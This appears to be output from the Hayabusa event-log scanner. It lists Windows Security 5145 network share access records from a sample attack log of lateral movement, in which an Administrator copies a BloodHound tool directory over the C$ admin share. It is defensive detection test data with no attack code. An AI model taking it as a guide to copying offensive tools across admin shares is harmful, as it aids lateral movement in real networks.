10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 